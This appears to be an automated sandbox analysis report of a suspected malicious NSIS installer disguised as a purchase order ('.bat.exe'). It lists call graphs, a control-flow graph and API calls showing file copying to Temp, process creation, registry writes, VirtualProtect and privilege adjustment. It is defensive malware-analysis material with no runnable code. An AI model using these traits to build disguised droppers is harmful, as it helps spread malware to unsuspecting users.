4933->4917 4933->4920 4933->4921 4933->4922 4933->4925 4933->4930 4940 405ce2 MessageBoxIndirectW 4933->4940 4943 406172 GetFileAttributesW CreateFileW 4933->4943 4935 4018eb 4934->4935 4936 4018fe 4934->4936 4938 4066bf 21 API calls 4935->4938 4937 4066bf 21 API calls 4936->4937 4939 401906 4937->4939 4941 4018f3 lstrcatW 4938->4941 4939->4932 4942 405ce2 MessageBoxIndirectW 4939->4942 4940->4933 4941->4939 4942->4932 4943->4933 4944->4911 4945->4912 5669 4014f5 SetForegroundWindow 5670 402c2f 5669->5670 5671 6fbb170d 5672 6fbb15b6 GlobalFree 5671->5672 5674 6fbb1725 5672->5674 5673 6fbb176b GlobalFree 5674->5673 5675 6fbb1740 5674->5675 5676 6fbb1757 VirtualFree 5674->5676 5675->5673 5676->5673 5677 401a77 5678 402d89 21 API calls 5677->5678 5679 401a80 5678->5679 5680 402d89 21 API calls 5679->5680 5681 401a25 5680->5681 5682 401578 5683 401591 5682->5683 5684 401588 ShowWindow 5682->5684 5685 402c2f 5683->5685 5686 40159f ShowWindow 5683->5686 5684->5683 5686->5685 4996 4023f9 4997 402dab 21 API calls 4996->4997 4998 402408 4997->4998 4999 402dab 21 API calls 4998->4999 5000 402411 4999->5000 5001 402dab 21 API calls 5000->5001 5002 40241b GetPrivateProfileStringW 5001->5002 5687 40567b 5688 40568b 5687->5688 5689 40569f 5687->5689 5692 405691 5688->5692 5699 4056e8 5688->5699 5690 4056be 5689->5690 5691 4056a7 IsWindowVisible 5689->5691 5694 4056ed CallWindowProcW 5690->5694 5698 40503c 4 API calls 5690->5698 5693 4056b4 5691->5693 5691->5699 5695 40464d SendMessageW 5692->5695 5696 404fbc 5 API calls 5693->5696 5697 40569b 5694->5697 5695->5697 5696->5690 5698->5699 5699->5694 5700 401ffb 5701 402dab 21 API calls 5700->5701 5702 402002 5701->5702 5703 4069df 2 API calls 5702->5703 5704 402008 5703->5704 5705 402019 5704->5705 5707 4065c9 wsprintfW 5704->5707 5707->5705 5708 6fbb1000 5709 6fbb101b 5 API calls 5708->5709 5710 6fbb1019 5709->5710 5711 401b7c 5712 402dab 21 API calls 5711->5712 5713 401b83 5712->5713 5714 402d89 21 API calls 5713->5714 5715 401b8c wsprintfW 5714->5715 5716 402c2f 5715->5716 5717 401000 5718 401037 BeginPaint GetClientRect 5717->5718 5719 40100c DefWindowProcW 5717->5719 5721 4010f3 5718->5721 5722 401179 5719->5722 5723 401073 CreateBrushIndirect FillRect DeleteObject 5721->5723 5724 4010fc 5721->5724 5723->5721 5725 401102 CreateFontIndirectW 5724->5725 5726 401167 EndPaint 5724->5726 5725->5726 5727 401112 6 API calls 5725->5727 5726->5722 5727->5726 5728 401680 5729 402dab 21 API calls 5728->5729 5730 401687 5729->5730 5731 402dab 21 API calls 5730->5731 5732 401690 5731->5732 5733 402dab 21 API calls 5732->5733 5734 401699 MoveFileW 5733->5734 5735 4016ac 5734->5735 5736 4016a5 5734->5736 5737 4069df 2 API calls 5735->5737 5740 4022fb 5735->5740 5738 401423 28 API calls 5736->5738 5739 4016bb 5737->5739 5738->5740 5739->5740 5741 406442 40 API calls 5739->5741 5741->5736 5742 404102 5743 40411a 5742->5743 5744 40427b 5742->5744 5743->5744 5745 404126 5743->5745 5746 40428c GetDlgItem GetDlgItem 5744->5746 5751 4042cc 5744->5751 5748 404131 SetWindowPos 5745->5748 5749 404144 5745->5749 5750 404601 22 API calls 5746->5750 5747 404326 5752 40464d SendMessageW 5747->5752 5764 404276 5747->5764 5748->5749 5753 40414d ShowWindow 5749->5753 5754 40418f 5749->5754 5755 4042b6 SetClassLongW 5750->5755 5751->5747 5756 401389 2 API calls 5751->5756 5786 404338 5752->5786 5757 40416d GetWindowLongW 5753->5757 5780 404239 5753->5780 5758 404197 DestroyWindow 5754->5758 5759 4041ae 5754->5759 5760 40140b 2 API calls 5755->5760 5761 4042fe 5756->5761 5763 404186 ShowWindow 5757->5763 5757->5780 5765 40458a 5758->5765 5766 4041b3 SetWindowLongW 5759->5766 5767 4041c4 5759->5767 5760->5751 5761->5747 5769 404302 SendMessageW 5761->5769 5762 404668 8 API calls 5762->5764 5763->5754 5765->5764 5774 4045bb ShowWindow 5765->5774 5766->5764 5768 4041d0 GetDlgItem 5767->5768 5767->5780 5772 4041e1 SendMessageW IsWindowEnabled 5768->5772 5773 4041fe 5768->5773 5769->5764 5770 40140b 2 API calls 5770->5786 5771 40458c DestroyWindow EndDialog 5771->5765 5772->5764 5772->5773 5776 40420b 5773->5776 5777 404252 SendMessageW 5773->5777 5778 40421e 5773->5778 5787 404203 5773->5787 5774->5764 5775 4066bf 21 API calls 5775->5786 5776->5777 5776->5787 5777->5780 5781 404226 5778->5781 5782 40423b 5778->5782 5779 4045da SendMessageW 5779->5780 5780->5762 5785 40140b 2 API calls 5781->5785 5784 40140b 2 API calls 5782->5784 5783 404601 22 API calls 5783->5786 5784->5787 5785->5787 5786->5764 5786->5770 5786->5771 5786->5775 5786->5783 5788 404601 22 API calls 5786->5788 5804 4044cc DestroyWindow 5786->5804 5787->5779 5787->5780 5789 4043b3 GetDlgItem 5788->5789 5790 4043d0 ShowWindow EnableWindow 5789->5790 5791 4043c8 5789->5791 5813 404623 EnableWindow 5790->5813 5791->5790 5793 4043fa EnableWindow 5798 40440e 5793->5798 5794 404413 GetSystemMenu EnableMenuItem SendMessageW 5795 404443 SendMessageW 5794->5795 5794->5798 5795->5798 5797 4040e3 22 API calls 5797->5798 5798->5794 5798->5797 5814 404636 SendMessageW 5798->5814 5815 406682 lstrcpynW 5798->5815 5800 404472 lstrlenW 5801 4066bf 21 API calls 5800->5801 5802 404488 SetWindowTextW 5801->5802 5803 401389 2 API calls 5802->5803 5803->5786 5804->5765 5805 4044e6 CreateDialogParamW 5804->5805 5805->5765 5806 404519 5805->5806 5807 404601 22 API calls 5806->5807 5808 404524 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5807->5808 5809 401389 2 API calls 5808->5809 5810 40456a 5809->5810 5810->5764 5811 404572 ShowWindow 5810->5811 5812 40464d SendMessageW 5811->5812 5812->5765 5813->5793 5814->5798 5815->5800 5816 6fbb1979 5817 6fbb199c 5816->5817 5818 6fbb19d1 GlobalFree 5817->5818 5819 6fbb19e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5817->5819 5818->5819 5820 6fbb1312 2 API calls 5819->5820 5821 6fbb1b6e GlobalFree GlobalFree 5820->5821 5822 401503 5823 401508 5822->5823 5825 401520 5822->5825 5824 402d89 21 API calls 5823->5824 5824->5825 4322 6fbb2a7f 4323 6fbb2acf 4322->4323 4324 6fbb2a8f VirtualProtect 4322->4324 4324->4323 5826 401a04 5827 402dab 21 API calls 5826->5827 5828 401a0b 5827->5828 5829 402dab 21 API calls 5828->5829 5830 401a14 5829->5830 5831 401a1b lstrcmpiW 5830->5831 5832 401a2d lstrcmpW 5830->5832 5833 401a21 5831->5833 5832->5833 5834 402304 5835 402dab 21 API calls 5834->5835 5836 40230a 5835->5836 5837 402dab 21 API calls 5836->5837 5838 402313 5837->5838 5839 402dab 21 API calls 5838->5839 5840 40231c 5839->5840 5841 4069df 2 API calls 5840->5841 5842 402325 5841->5842 5843 402336 lstrlenW lstrlenW 5842->5843 5844 402329 5842->5844 5846 405707 28 API calls 5843->5846 5845 405707 28 API calls 5844->5845 5847 402331 5844->5847 5845->5847 5848 402374 SHFileOperationW 5846->5848 5848->5844 5848->5847 5856 401d86 5857 401d99 GetDlgItem 5856->5857 5858 401d8c 5856->5858 5859 401d93 5857->5859 5860 402d89 21 API calls 5858->5860 5861 401dda GetClientRect LoadImageW SendMessageW 5859->5861 5862 402dab 21 API calls 5859->5862 5860->5859 5864 401e38 5861->5864 5866 401e44 5861->5866 5862->5861 5865 401e3d DeleteObject 5864->5865 5864->5866 5865->5866 5867 402388 5868 4023a2 5867->5868 5869 40238f 5867->5869 5870 4066bf 21 API calls 5869->5870 5871 40239c 5870->5871 5871->5868 5872 405ce2 MessageBoxIndirectW 5871->5872 5872->5868 4830 401389 4832 401390 4830->4832 4831 4013fe 4832->4831 4833 4013cb MulDiv SendMessageW 4832->4833 4833->4832 5873 402c0a SendMessageW 5874 402c24 InvalidateRect 5873->5874 5875 402c2f 5873->5875 5874->5875 4855 40248f 4856 402dab 21 API calls 4855->4856 4857 4024a1 4856->4857 4858 402dab 21 API calls 4857->4858 4859 4024ab 4858->4859 4872 402e3b 4859->4872 4862 402c2f 4863 4024e3 4865 4024ef 4863->4865 4868 402d89 21 API calls 4863->4868 4864 402dab 21 API calls 4867 4024d9 lstrlenW 4864->4867 4866 40250e RegSetValueExW 4865->4866 4869 403376 48 API calls 4865->4869 4870 402524 RegCloseKey 4866->4870 4867->4863 4868->4865 4869->4866 4870->4862 4873 402e56 4872->4873 4876 40651d 4873->4876 4877 40652c 4876->4877 4878 4024bb 4877->4878 4879 406537 RegCreateKeyExW 4877->4879 4878->4862 4878->4863 4878->4864 4879->4878 5876 6fbb1774 5877 6fbb17a3 5876->5877 5878 6fbb1bff 22 API calls 5877->5878 5879 6fbb17aa 5878->5879 5880 6fbb17bd 5879->5880 5881 6fbb17b1 5879->5881 5882 6fbb17c7 5880->5882 5883 6fbb17e4 5880->5883 5884 6fbb1312 2 API calls 5881->5884 5885 6fbb15dd 3 API calls 5882->5885 5886 6fbb17ea 5883->5886 5887 6fbb180e 5883->5887 5888 6fbb17bb 5884->5888 5890 6fbb17cc 5885->5890 5891 6fbb1654 3 API calls 5886->5891 5889 6fbb15dd 3 API calls 5887->5889 5889->5888 5892 6fbb1654 3 API calls 5890->5892 5893 6fbb17ef 5891->5893 5894 6fbb17d2 5892->5894 5895 6fbb1312 2 API calls 5893->5895 5896 6fbb1312 2 API calls 5894->5896 5897 6fbb17f5 GlobalFree 5895->5897 5898 6fbb17d8 GlobalFree 5896->5898 5897->5888 5899 6fbb1809 GlobalFree 5897->5899 5898->5888 5899->5888 5900 402910 5901 402dab 21 API calls 5900->5901 5902 402917 FindFirstFileW 5901->5902 5903 40293f 5902->5903 5907 40292a 5902->5907 5904 402948 5903->5904 5908 4065c9 wsprintfW 5903->5908 5909 406682 lstrcpynW 5904->5909 5908->5904 5909->5907 5910 401911 5911 401948 5910->5911 5912 402dab 21 API calls 5911->5912 5913 40194d 5912->5913 5914 405d8e 71 API calls 5913->5914 5915 401956 5914->5915 5916 401491 5917 405707 28 API calls 5916->5917 5918 401498 5917->5918 5919 6fbb23e9 5920 6fbb2453 5919->5920 5921 6fbb245e GlobalAlloc 5920->5921 5922 6fbb247d 5920->5922 5921->5920 5923 403d12 5924 403d1d 5923->5924 5925 403d24 GlobalAlloc 5924->5925 5926 403d21 5924->5926 5925->5926 5927 407493 5930 406c24 5927->5930 5928 406ca5 GlobalFree 5929 406cae GlobalAlloc 5928->5929 5929->5930 5931 40758f 5929->5931 5930->5928 5930->5929 5930->5930 5930->5931 5932 406d25 GlobalAlloc 5930->5932 5933 406d1c GlobalFree 5930->5933 5932->5930 5932->5931 5933->5932 5934 401914 5935 402dab 21 API calls 5934->5935 5936 40191b 5935->5936 5937 405ce2 MessageBoxIndirectW 5936->5937 5938 401924 5937->5938 4946 402896 4947 40289d 4946->4947 4949 402bae 4946->4949 4948 402d89 21 API calls 4947->4948 4950 4028a4 4948->4950 4951 4028b3 SetFilePointer 4950->4951 4951->4949 4952 4028c3 4951->4952 4954 4065c9 wsprintfW 4952->4954 4954->4949 5939 401f17 5940 402dab 21 API calls 5939->5940 5941 401f1d 5940->5941 5942 402dab 21 API calls 5941->5942 5943 401f26 5942->5943 5944 402dab 21 API calls 5943->5944 5945 401f2f 5944->5945 5946 402dab 21 API calls 5945->5946 5947 401f38 5946->5947 5948 401423 28 API calls 5947->5948 5949 401f3f 5948->5949 5956 405ca8 ShellExecuteExW 5949->5956 5951 401f87 5952 406b21 5 API calls 5951->5952 5953 402933 5951->5953 5954 401fa4 CloseHandle 5952->5954 5954->5953 5956->5951 5957 402f98 5958 402fc3 5957->5958 5959 402faa SetTimer 5957->5959 5960 403011 5958->5960 5961 403017 MulDiv 5958->5961 5959->5958 5962 402fd1 wsprintfW SetWindowTextW SetDlgItemTextW 5961->5962 5962->5960 5964 6fbb10e1 5970 6fbb1111 5964->5970 5965 6fbb12b0 GlobalFree 5966 6fbb11d7 GlobalAlloc 5966->5970 5967 6fbb1240 GlobalFree 5967->5970 5968 6fbb135a 2 API calls 5968->5970 5969 6fbb12ab 5969->5965 5970->5965 5970->5966 5970->5967 5970->5968 5970->5969 5971 6fbb1312 2 API calls 5970->5971 5972 6fbb129a GlobalFree 5970->5972 5973 6fbb116b GlobalAlloc 5970->5973 5974 6fbb1381 lstrcpyW 5970->5974 5971->5970 5972->5970 5973->5970 5974->5970 5975 401d1c 5976 402d89 21 API calls 5975->5976 5977 401d22 IsWindow 5976->5977 5978 401a25 5977->5978 5979 40149e 5980 4014ac PostQuitMessage 5979->5980 5981 4023a2 5979->5981 5980->5981 5982 401ba0 5983 401bf1 5982->5983 5984 401bad 5982->5984 5985 401bf6 5983->5985 5986 401c1b GlobalAlloc 5983->5986 5987 401c36 5984->5987 5991 401bc4 5984->5991 5995 4023a2 5985->5995 6003 406682 lstrcpynW 5985->6003 5988 4066bf 21 API calls 5986->5988 5989 4066bf 21 API calls 5987->5989 5987->5995 5988->5987 5992 40239c 5989->5992 6001 406682 lstrcpynW 5991->6001 5992->5995 5996 405ce2 MessageBoxIndirectW 5992->5996 5993 401c08 GlobalFree 5993->5995 5996->5995 5997 401bd3 6002 406682 lstrcpynW 5997->6002 5999 401be2 6004 406682 lstrcpynW 5999->6004 6001->5997 6002->5999 6003->5993 6004->5995 6005 406da0 6006 406c24 6005->6006 6007 40758f 6006->6007 6008 406ca5 GlobalFree 6006->6008 6009 406cae GlobalAlloc 6006->6009 6010 406d25 GlobalAlloc 6006->6010 6011 406d1c GlobalFree 6006->6011 6008->6009 6009->6006 6009->6007 6010->6006 6010->6007 6011->6010 6012 402621 6013 402dab 21 API calls 6012->6013 6014 402628 6013->6014 6017 406172 GetFileAttributesW CreateFileW 6014->6017 6016 402634 6017->6016 4302 4025a3 4314 402deb 4302->4314 4306 4025b6 4307 4025c5 4306->4307 4312 402933 4306->4312 4308 4025d2 RegEnumKeyW 4307->4308 4309 4025de RegEnumValueW 4307->4309 4310 4025fa RegCloseKey 4308->4310 4309->4310 4311 4025f3 4309->4311 4310->4312 4311->4310 4315 402dab 21 API calls 4314->4315 4316 402e02 4315->4316 4317 4064ef RegOpenKeyExW 4316->4317 4318 4025ad 4317->4318 4319 402d89 4318->4319 4320 4066bf 21 API calls 4319->4320 4321 402d9e 4320->4321 4321->4306 6018 6fbb1058 6020 6fbb1074 6018->6020 6019 6fbb10dd 6020->6019 6021 6fbb1092 6020->6021 6022 6fbb15b6 GlobalFree 6020->6022 6023 6fbb15b6 GlobalFree 6021->6023 6022->6021 6024 6fbb10a2 6023->6024 6025 6fbb10a9 GlobalSize 6024->6025 6026 6fbb10b2 6024->6026 6025->6026 6027 6fbb10c7 6026->6027 6028 6fbb10b6 GlobalAlloc 6026->6028 6030 6fbb10d2 GlobalFree 6027->6030 6029 6fbb15dd 3 API calls 6028->6029 6029->6027 6030->6019 6031 4015a8 6032 402dab 21 API calls 6031->6032 6033 4015af SetFileAttributesW 6032->6033 6034 4015c1 6033->6034 4834 401fa9 4835 402dab 21 API calls 4834->4835 4836 401faf 4835->4836 4837 405707 28 API calls 4836->4837 4838 401fb9 4837->4838 4839 405c65 2 API calls 4838->4839 4840 401fbf 4839->4840 4843 402933 4840->4843 4847 401fe2 CloseHandle 4840->4847 4849 406b21 WaitForSingleObject 4840->4849 4844 401fd4 4845 401fe4 4844->4845 4846 401fd9 4844->4846 4845->4847 4854 4065c9 wsprintfW 4846->4854 4847->4843 4850 406b3b 4849->4850 4851 406b4d GetExitCodeProcess 4850->4851 4852 406ab2 2 API calls 4850->4852 4851->4844 4853 406b42 WaitForSingleObject 4852->4853 4853->4850 4854->4847 6042 404aab 6043 404ae1 6042->6043 6044 404abb 6042->6044 6045 404668 8 API calls 6043->6045 6046 404601 22 API calls 6044->6046 6047 404aed 6045->6047 6048 404ac8 SetDlgItemTextW 6046->6048 6048->6043 6049 40202f 6050 402dab 21 API calls 6049->6050 6051 402036 6050->6051 6052 406a76 5 API calls 6051->6052 6053 402045 6052->6053 6054 402061 GlobalAlloc 6053->6054 6056 4020d1 6053->6056 6055 402075 6054->6055 6054->6056 6057 406a76 5 API calls 6055->6057 6058 40207c 6057->6058 6059 406a76 5 API calls 6058->6059 6060 402086 6059->6060 6060->6056 6064 4065c9 wsprintfW 6060->6064 6062 4020bf 6065 4065c9 wsprintfW 6062->6065 6064->6062 6065->6056 6066 40252f 6067 402deb 21 API calls 6066->6067 6068 402539 6067->6068 6069 402dab 21 API calls 6068->6069 6070 402542 6069->6070 6071 40254d RegQueryValueExW 6070->6071 6074 402933 6070->6074 6072 402573 RegCloseKey 6071->6072 6073 40256d 6071->6073 6072->6074 6073->6072 6077 4065c9 wsprintfW 6073->6077 6077->6072 6078 4021af 6079 402dab 21 API calls 6078->6079 6080 4021b6 6079->6080 6081 402dab 21 API calls 6080->6081 6082 4021c0 6081->6082 6083 402dab 21 API calls 6082->6083 6084 4021ca 6083->6084 6085 402dab 21 API calls 6084->6085 6086 4021d4 6085->6086 6087 402dab 21 API calls 6086->6087 6088 4021de 6087->6088 6089 40221d CoCreateInstance 6088->6089 6090 402dab 21 API calls 6088->6090 6093 40223c 6089->6093 6090->6089 6091 401423 28 API calls 6092 4022fb 6091->6092 6093->6091 6093->6092 6094 401a35 6095 402dab 21 API calls 6094->6095 6096 401a3e ExpandEnvironmentStringsW 6095->6096 6097 401a52 6096->6097 6099 401a65 6096->6099 6098 401a57 lstrcmpW 6097->6098 6097->6099 6098->6099 4955 4023b7 4956 4023bf 4955->4956 4959 4023c5 4955->4959 4957 402dab 21 API calls 4956->4957 4957->4959 4958 402dab 21 API calls 4960 4023d3 4958->4960 4959->4958 4959->4960 4961 402dab 21 API calls 4960->4961 4963 4023e1 4960->4963 4961->4963 4962 402dab 21 API calls 4964 4023ea WritePrivateProfileStringW 4962->4964 4963->4962 6100 404737 lstrcpynW lstrlenW 6106 4014b8 6107 4014be 6106->6107 6108 401389 2 API calls 6107->6108 6109 4014c6 6108->6109 6110 6fbb2d43 6111 6fbb2d5b 6110->6111 6112 6fbb162f 2 API calls 6111->6112 6113 6fbb2d76 6112->6113 4965 402439 4966 402441 4965->4966 4967 40246c 4965->4967 4968 402deb 21 API calls 4966->4968 4969 402dab 21 API calls 4967->4969 4970 402448 4968->4970 4971 402473 4969->4971 4972 402452 4970->4972 4976 402480 4970->4976 4977 402e69 4971->4977 4974 402dab 21 API calls 4972->4974 4975 402459 RegDeleteValueW RegCloseKey 4974->4975 4975->4976 4978 402e7d 4977->4978 4979 402e76 4977->4979 4978->4979 4981 402eae 4978->4981 4979->4976 4982 4064ef RegOpenKeyExW 4981->4982 4983 402edc 4982->4983 4984 402f91 4983->4984 4985 402ee6 4983->4985 4984->4979 4986 402eec RegEnumValueW 4985->4986 4990 402f0f 4985->4990 4987 402f76 RegCloseKey 4986->4987 4986->4990 4987->4984 4988 402f4b RegEnumKeyW 4989 402f54 RegCloseKey 4988->4989 4988->4990 4991 406a76 5 API calls 4989->4991 4990->4987 4990->4988 4990->4989 4993 402eae 6 API calls 4990->4993 4992 402f64 4991->4992 4994 402f86 4992->4994 4995 402f68 RegDeleteKeyW 4992->4995 4993->4990 4994->4984 4995->4984 6114 40173a 6115 402dab 21 API calls 6114->6115 6116 401741 SearchPathW 6115->6116 6117 40175c 6116->6117 6118 401d3d 6119 402d89 21 API calls 6118->6119 6120 401d44 6119->6120 6121 402d89 21 API calls 6120->6121 6122 401d50 GetDlgItem 6121->6122 6123 40263d 6122->6123

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 403645-403697 SetErrorMode GetVersionExW 1 4036d1-4036d6 0->1 2 403699-4036c9 GetVersionExW 0->2 3 4036d8 1->3 4 4036de-403720 1->4 2->1 3->4 5 403722-40372a call 406a76 4->5 6 403733 4->6 5->6 11 40372c 5->11 8 403738-40374c call 406a06 lstrlenA 6->8 13 40374e-40376a call 406a76 * 3 8->13 11->6 20 40377b-4037df #17 OleInitialize SHGetFileInfoW call 406682 GetCommandLineW call 406682 13->20 21 40376c-403772 13->21 28 4037e1-4037e3 20->28 29 4037e8-4037fc call 405f7e CharNextW 20->29 21->20 25 403774 21->25 25->20 28->29 32 4038f7-4038fd 29->32 33 403801-403807 32->33 34 403903 32->34 35 403810-403817 33->35 36 403809-40380e 33->36 37 403917-403931 GetTempPathW call 403614 34->37 38 403819-40381e 35->38 39 40381f-403823 35->39 36->35 36->36 47 403933-403951 GetWindowsDirectoryW lstrcatW call 403614 37->47 48 403989-4039a3 DeleteFileW call 4030d5 37->48 38->39 41 4038e4-4038f3 call 405f7e 39->41 42 403829-40382f 39->42 41->32 59 4038f5-4038f6 41->59 45 403831-403838 42->45 46 403849-403882 42->46 52 40383a-40383d 45->52 53 40383f 45->53 54 403884-403889 46->54 55 40389f-4038d9 46->55 47->48 62 403953-403983 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403614 47->62 64 403b90-403ba0 call 403c62 OleUninitialize 48->64 65 4039a9-4039af 48->65 52->46 52->53 53->46 54->55 61 40388b-403893 54->61 57 4038e1-4038e3 55->57 58 4038db-4038df 55->58 57->41 58->57 63 403905-403912 call 406682 58->63 59->32 66 403895-403898 61->66 67 40389a 61->67 62->48 62->64 63->37 77 403ba2-403bb2 call 405ce2 ExitProcess 64->77 78 403bc6-403bcc 64->78 70 4039b5-4039c0 call 405f7e 65->70 71 403a48-403a4f call 403d54 65->71 66->55 66->67 67->55 82 4039c2-4039f7 70->82 83 403a0e-403a18 70->83 80 403a54-403a58 71->80 84 403c4a-403c52 78->84 85 403bce-403be4 GetCurrentProcess OpenProcessToken 78->85 80->64 91 4039f9-4039fd 82->91 86 403a1a-403a28 call 406059 83->86 87 403a5d-403a83 call 405c4d lstrlenW call 406682 83->87 88 403c54 84->88 89 403c58-403c5c ExitProcess 84->89 92 403be6-403c14 LookupPrivilegeValueW AdjustTokenPrivileges 85->92 93 403c1a-403c28 call 406a76 85->93 86->64 106 403a2e-403a44 call 406682 * 2 86->106 110 403a94-403aac 87->110 111 403a85-403a8f call 406682 87->111 88->89 97 403a06-403a0a 91->97 98 4039ff-403a04 91->98 92->93 104 403c36-403c41 ExitWindowsEx 93->104 105 403c2a-403c34 93->105 97->91 99 403a0c 97->99 98->97 98->99 99->83 104->84 108 403c43-403c45 call 40140b 104->108 105->104 105->108 106->71 108->84 116 403ab1-403ab5 110->116 111->110 118 403aba-403ae4 wsprintfW call 4066bf 116->118 122 403ae6-403aeb call 405bd6 118->122 123 403aed call 405c30 118->123 127 403af2-403af4 122->127 123->127 128 403b30-403b4f SetCurrentDirectoryW call 406442 CopyFileW 127->128 129 403af6-403b00 GetFileAttributesW 127->129 137 403b51-403b72 call 406442 call 4066bf call 405c65 128->137 138 403b8e 128->138 130 403b21-403b2c 129->130 131 403b02-403b0b DeleteFileW 129->131 130->116 134 403b2e 130->134 131->130 133 403b0d-403b1f call 405d8e 131->133 133->118 133->130 134->64 146 403b74-403b7e 137->146 147 403bb8-403bc4 CloseHandle 137->147 138->64 146->138 148 403b80-403b88 call 4069df 146->148 147->138 148->118 148->138
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE ref: 00403668
                                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403693
                                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036A6
                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040373F
                                                                      • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040377C
                                                                      • OleInitialize.OLE32(00000000), ref: 00403783
                                                                      • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037A2
                                                                      • GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037B7
                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe",00000020,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F0
                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403928
                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403939
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403945
                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403961
                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403972
                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040397A
                                                                      • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040398E
                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A67
                                                                        • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                                      • wsprintfW.USER32 ref: 00403AC4
                                                                      • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403AF7
                                                                      • DeleteFileW.KERNEL32(0042C800), ref: 00403B03
                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B31
                                                                        • Part of subcall function 00406442: MoveFileExW.KERNEL32(?,?,00000005,00405F40,?,00000000,000000F1,?,?,?,?,?), ref: 0040644C
                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B47
                                                                        • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                        • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                        • Part of subcall function 004069DF: FindFirstFileW.KERNELBASE(75923420,00425F98,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004069EA
                                                                        • Part of subcall function 004069DF: FindClose.KERNEL32(00000000), ref: 004069F6
                                                                      • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B95
                                                                      • ExitProcess.KERNEL32 ref: 00403BB2
                                                                      • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BB9
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BD5
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BDC
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF1
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C14
                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C39
                                                                      • ExitProcess.KERNEL32 ref: 00403C5C
                                                                        • Part of subcall function 00405C30: CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
